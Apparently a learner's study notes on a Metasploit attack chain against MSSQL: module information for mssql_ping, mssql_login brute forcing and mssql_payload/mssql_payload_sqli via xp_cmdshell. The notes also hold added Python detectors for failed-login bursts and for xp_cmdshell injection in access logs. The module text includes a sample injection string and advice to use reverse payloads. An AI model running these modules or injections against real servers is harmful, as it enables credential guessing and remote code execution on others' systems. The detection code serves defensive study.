Study notes
Penetration-testing MSSQL with Metasploit (my lab VM does not run an MSSQL service, so only the method is recorded, heh)
Step 1: use mssql_ping to gather information
Name: MSSQL Ping Utility
Module: auxiliary/scanner/mssql/mssql_ping
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
MC <mc@metasploit.com>
Check supported:
No
Basic options:
Name                 Current Setting  Required  Description
----                 ---------------  --------  -----------
PASSWORD             qwer             no        The password for the specified username
RHOSTS               192.168.1.112    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
TDSENCRYPTION        false            yes       Use TLS/SSL for TDS data "Force Encryption"
THREADS              200              yes       The number of concurrent threads (max one per host)
USERNAME             root             no        The username to authenticate as
USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)
Description:
This module simply queries the MSSQL instance for information.
Step 2: use mssql_login to brute-force credentials
Name: MSSQL Login Utility
Module: auxiliary/scanner/mssql/mssql_login
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
MC <mc@metasploit.com>
Check supported:
No
Basic options:
Name                 Current Setting  Required  Description
----                 ---------------  --------  -----------
BLANK_PASSWORDS      true             no        Try blank passwords for all users
BRUTEFORCE_SPEED     5                yes       How fast to bruteforce, from 0 to 5
DB_ALL_CREDS         false            no        Try each user/password couple stored in the current database
DB_ALL_PASS          false            no        Add all passwords in the current database to the list
DB_ALL_USERS         false            no        Add all users in the current database to the list
PASSWORD             qwer             no        A specific password to authenticate with
PASS_FILE            passwords.txt    no        File containing passwords, one per line
RHOSTS               192.168.1.112    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT                1433             yes       The target port (TCP)
STOP_ON_SUCCESS      false            yes       Stop guessing when a credential works for a host
TDSENCRYPTION        false            yes       Use TLS/SSL for TDS data "Force Encryption"
THREADS              200              yes       The number of concurrent threads (max one per host)
USERNAME             root             no        A specific username to authenticate as
USERPASS_FILE                         no        File containing users and passwords separated by space, one pair per line
USER_AS_PASS         false            no        Try the username as the password for all users
USER_FILE                             no        File containing usernames, one per line
USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)
VERBOSE              true             yes       Whether to print output for all attempts
Description:
This module simply queries the MSSQL instance for a specific
user/pass (default is sa with blank).
References:
https://nvd.nist.gov/vuln/detail/CVE-1999-0506
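From the defender's side, a run of mssql_login with USER_FILE/PASS_FILE shows up in the SQL Server ERRORLOG as a burst of error 18456 "Login failed" entries from one client. The following is an added example (not from the page or from Metasploit) that parses such lines and flags clients that exceed a failure or distinct-user threshold; the log lines, IP addresses and thresholds are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample of SQL Server ERRORLOG lines (not taken from the page or any real server).
# A password-guessing run such as mssql_login produces one "Error: 18456" pair per attempt.
SAMPLE_ERRORLOG = """\
2024-01-15 10:02:11.10 Logon       Error: 18456, Severity: 14, State: 8.
2024-01-15 10:02:11.10 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.50]
2024-01-15 10:02:11.31 Logon       Error: 18456, Severity: 14, State: 8.
2024-01-15 10:02:11.31 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.50]
2024-01-15 10:02:11.52 Logon       Error: 18456, Severity: 14, State: 5.
2024-01-15 10:02:11.52 Logon       Login failed for user 'root'. Reason: Could not find a login matching the name provided. [CLIENT: 192.168.1.50]
2024-01-15 10:02:11.73 Logon       Error: 18456, Severity: 14, State: 5.
2024-01-15 10:02:11.73 Logon       Login failed for user 'admin'. Reason: Could not find a login matching the name provided. [CLIENT: 192.168.1.50]
2024-01-15 10:03:40.00 Logon       Error: 18456, Severity: 14, State: 8.
2024-01-15 10:03:40.00 Logon       Login failed for user 'appuser'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.7]
"""

LOGIN_FAILED = re.compile(
    r"^(?P<ts>\S+ \S+) Logon\s+Login failed for user '(?P<user>[^']*)'\."
    r".*\[CLIENT: (?P<client>[^\]]+)\]"
)

def failed_logins_by_client(errorlog: str):
    """Return {client_ip: {"count": n, "users": sorted user names}} over all failed logins."""
    stats = defaultdict(lambda: {"count": 0, "users": set()})
    for line in errorlog.splitlines():
        m = LOGIN_FAILED.match(line)
        if not m:
            continue  # the bare "Error: 18456" line and unrelated lines are skipped
        entry = stats[m.group("client")]
        entry["count"] += 1
        entry["users"].add(m.group("user"))
    return {ip: {"count": e["count"], "users": sorted(e["users"])} for ip, e in stats.items()}

def flag_password_guessing(errorlog: str, max_failures: int = 3, max_users: int = 2):
    """Clients exceeding either threshold are reported. Many distinct user names from one
    client is the signature of USER_FILE/PASS_FILE style guessing rather than a typo."""
    return sorted(
        ip for ip, e in failed_logins_by_client(errorlog).items()
        if e["count"] > max_failures or len(e["users"]) > max_users
    )
```

Thresholds are per-log-file here; in production the same counting is done per time window, and a low BRUTEFORCE_SPEED spreads attempts out, so the window should be generous.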
Step 3: use mssql_payload to escalate privileges
Name: Microsoft SQL Server Payload Execution
Module: exploit/windows/mssql/mssql_payload
Platform: Windows
Arch: x86, x64
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2000-05-30
Provided by:
David Kennedy "ReL1K" <kennedyd013@gmail.com>
jduck <jduck@metasploit.com>
Available targets:
Id Name
-- ----
0 Automatic
Check supported:
Yes
Basic options:
Name                 Current Setting  Required  Description
----                 ---------------  --------  -----------
METHOD               cmd              yes       Which payload delivery method to use (ps, cmd, or old)
PASSWORD             qwer             no        The password for the specified username
RHOSTS               192.168.1.112    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT                1433             yes       The target port (TCP)
SRVHOST              0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT              8080             yes       The local port to listen on.
SSL                  false            no        Negotiate SSL for incoming connections
SSLCert                               no        Path to a custom SSL certificate (default is randomly generated)
TDSENCRYPTION        false            yes       Use TLS/SSL for TDS data "Force Encryption"
URIPATH                               no        The URI to use for this exploit (default is random)
USERNAME             root             no        The username to authenticate as
USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)
Payload information:
Description:
This module executes an arbitrary payload on a Microsoft SQL Server
by using the "xp_cmdshell" stored procedure. Currently, three
delivery methods are supported. First, the original method uses
Windows 'debug.com'. File size restrictions are avoided by
incorporating the debug bypass method presented by SecureStat at
Defcon 17. Since this method invokes ntvdm, it is not available on
x64 systems. A second method takes advantage of the Command Stager
subsystem. This allows using various techniques, such as using a
TFTP server, to send the executable. By default the Command Stager
uses 'wcsript.exe' to generate the executable on the target.
Finally, ReL1K's latest method utilizes PowerShell to transmit and
recreate the payload on the target. NOTE: This module will leave a
payload executable on the target system when the attack is finished.
References:
https://nvd.nist.gov/vuln/detail/CVE-2000-0402
OSVDB (557)
http://www.securityfocus.com/bid/1281
https://nvd.nist.gov/vuln/detail/CVE-2000-1209
OSVDB (15757)
http://www.securityfocus.com/bid/4797
When using this exploit module, remember to change the payload.
Name: Microsoft SQL Server Payload Execution via SQL Injection
Module: exploit/windows/mssql/mssql_payload_sqli
Platform: Windows
Arch: x86, x64
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2000-05-30
Provided by:
David Kennedy "ReL1K" <kennedyd013@gmail.com>
jduck <jduck@metasploit.com>
Rodrigo Marcos
Available targets:
Id Name
-- ----
0 Automatic
Check supported:
No
Basic options:
Name        Current Setting  Required  Description
----        ---------------  --------  -----------
COOKIE                       no        Cookie value
DATA                         no        POST data, if necessary, with [SQLi] indicating the injection
DELIVERY    OLD              yes       Payload delivery method (Accepted: PS, CMD, OLD)
GET_PATH    /                yes       The complete path with [SQLi] indicating the injection
METHOD      GET              yes       GET or POST
Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS      192.168.1.112    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT       80               yes       The target port (TCP)
SRVHOST     0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT     8080             yes       The local port to listen on.
SSL         false            no        Negotiate SSL/TLS for outgoing connections
SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
URIPATH                      no        The URI to use for this exploit (default is random)
VHOST                        no        HTTP server virtual host
Payload information:
Avoid: 27 characters
Description:
This module will execute an arbitrary payload on a Microsoft SQL
Server, using a SQL injection vulnerability. Once a vulnerability is
identified this module will use xp_cmdshell to upload and execute
Metasploit payloads. It is necessary to specify the exact point
where the SQL injection vulnerability happens. For example, given
the following injection: http://www.example.com/show.asp?id=1;exec
xp_cmdshell 'dir';--&cat=electrical you would need to set the
following path: set GET_PATH
/showproduct.asp?id=1;[SQLi];--&cat=foobar In regard to the payload,
unless there is a closed port in the web server, you dont want to
use any "bind" payload, specially on port 80, as you will stop
reaching the vulnerable web server host. You want a "reverse"
payload, probably to your port 80 or to any other outbound port
allowed on the firewall. For privileged ports execute Metasploit
msfconsole as root. Currently, three delivery methods are supported.
First, the original method uses Windows 'debug.com'. File size
restrictions are avoided by incorporating the debug bypass method
presented by SecureStat at Defcon 17. Since this method invokes
ntvdm, it is not available on x64 systems. A second method takes
advantage of the Command Stager subsystem. This allows using various
techniques, such as using a TFTP server, to send the executable. By
default the Command Stager uses 'wcsript.exe' to generate the
executable on the target. Finally, ReL1K's latest method utilizes
PowerShell to transmit and recreate the payload on the target. NOTE:
This module will leave a payload executable on the target system
when the attack is finished.
References:
https://nvd.nist.gov/vuln/detail/CVE-2000-0402
OSVDB (557)
http://www.securityfocus.com/bid/1281
https://nvd.nist.gov/vuln/detail/CVE-2000-1209
OSVDB (15757)
http://www.securityfocus.com/bid/4797
http://www.secforce.co.uk/blog/2011/01/penetration-testing-sql-injection-and-metasploit/
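The injection shape the mssql_payload_sqli description quotes (`show.asp?id=1;exec xp_cmdshell 'dir';--`) is visible in ordinary web server access logs, provided the URL is decoded before matching. This is an added example (not from the page, Metasploit or the referenced blog) that scans constructed combined-format access log lines for xp_cmdshell-style indicators in the request path; the hosts, paths and patterns are assumptions for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample of access log lines in combined format (not real traffic).
# The third line mirrors the injection shape quoted in the module description.
SAMPLE_ACCESS_LOG = """\
203.0.113.9 - - [15/Jan/2024:10:05:01 +0000] "GET /show.asp?id=1&cat=electrical HTTP/1.1" 200 5120
203.0.113.9 - - [15/Jan/2024:10:05:02 +0000] "GET /show.asp?id=2 HTTP/1.1" 200 4980
198.51.100.23 - - [15/Jan/2024:10:06:10 +0000] "GET /show.asp?id=1;exec%20xp_cmdshell%20'dir';--&cat=electrical HTTP/1.1" 200 612
198.51.100.23 - - [15/Jan/2024:10:06:12 +0000] "POST /show.asp HTTP/1.1" 200 600
"""

REQUEST = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*"'
)

# Indicators of the xp_cmdshell route, matched after URL decoding so that
# percent-encoded spaces and quotes cannot hide them.
INDICATORS = (
    re.compile(r"xp_cmdshell", re.I),
    re.compile(r";\s*exec\b", re.I),
)

def suspicious_requests(access_log: str):
    """Return (client, method, decoded path, indicator) for each request whose decoded
    URL contains an xp_cmdshell-style SQL injection indicator."""
    hits = []
    for line in access_log.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        decoded = unquote_plus(m.group("path"))
        for pat in INDICATORS:
            if pat.search(decoded):
                hits.append((m.group("client"), m.group("method"), decoded, pat.pattern))
                break  # one hit per request line is enough
    return hits
```

Only the request line is inspected, so an injection delivered through the DATA (POST body) option is invisible here; catching that needs request body logging or a WAF in front of the server.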